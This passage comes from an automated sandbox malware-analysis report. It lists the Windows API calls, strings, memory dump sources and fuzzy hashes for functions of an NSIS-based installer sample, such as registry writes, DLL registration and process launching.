                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32 ref: 004028DA
                                                                                              • lstrlenW.KERNEL32(004140F8,00000023), ref: 004028FD
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 1641139501-220328614
                                                                                              • Opcode ID: d958fd76f88238eb0f7cc79a7d79a6eb52ad85dc18d7d29f29bd3c0ecbd32b7a
                                                                                              • Instruction ID: 3a711ce488b3866fcb9061d5808ce08c9ab16aa35aeea96f80e01af263f61eb3
                                                                                              • Opcode Fuzzy Hash: d958fd76f88238eb0f7cc79a7d79a6eb52ad85dc18d7d29f29bd3c0ecbd32b7a
                                                                                              • Instruction Fuzzy Hash: 26317AB6D00208BBCF22AF91CE4699EBB3AAF54754F10807BF505741E2D3794A60DB69
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3734993849-3206598305
                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001), ref: 004041CA
                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                              • SendMessageW.USER32(00000000,00000443,?,?), ref: 004041E9
                                                                                              • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004041F7
                                                                                              • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 00404202
                                                                                              • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 0040420F
                                                                                              • SendMessageW.USER32(00000000,00000449,?,?), ref: 0040421E
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040400D
                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040401C
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00404030
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ByteCharMultiWide$AllocButtonCheckColorGlobalItemlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3308522672-0
                                                                                              • Opcode ID: 92fb63e93fde23918862b09df57026c889a1a6ab7d66aeb1194141a1a2bce82f
                                                                                              • Instruction ID: af82ae006247851a06cb381f8d91bd758d4f052c7a01275e3eddf0e039b5722d
                                                                                              • Opcode Fuzzy Hash: 92fb63e93fde23918862b09df57026c889a1a6ab7d66aeb1194141a1a2bce82f
                                                                                              • Instruction Fuzzy Hash: 4631A3F1900109BFDB019F65DC85EAA3BB8FB44744F00843AFA05FA2E1D7789A51DB59
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427179,774D23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                              Strings
                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                              • `G, xrefs: 0040246E
                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                              • API String ID: 1033533793-4193110038
                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427179,774D23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                              Strings
                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                              • API String ID: 2014279497-3433828417
                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                              • MulDiv.KERNEL32(00010000,00000064,0013E8B2), ref: 00403295
                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32 ref: 004028DA
                                                                                              • lstrlenW.KERNEL32(004140F8,00000023), ref: 004028FD
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                              Strings
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                              • String ID: WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 1641139501-1479857800
                                                                                              • Opcode ID: f3e5be1d7ca10b73f0ad9d9aa3ab872aee3b1c675020543ca51d87078fff07ed
                                                                                              • Instruction ID: 39dc8902ed9304caa48c13be4cf47868bf621f01bbc3466687cbeb32f49bb943
                                                                                              • Opcode Fuzzy Hash: f3e5be1d7ca10b73f0ad9d9aa3ab872aee3b1c675020543ca51d87078fff07ed
                                                                                              • Instruction Fuzzy Hash: 490179B1E00209FBCF219F91CE499AEBF75EB50704F20807BE506B11A1D3794E11EB59
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GlobalFree.KERNEL32(007B75D8), ref: 00402387
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGloballstrcpyn
                                                                                              • String ID: 175$Exch: stack < %d elements$Pop: stack empty
                                                                                              • API String ID: 1459762280-2077002350
                                                                                              • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                              • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
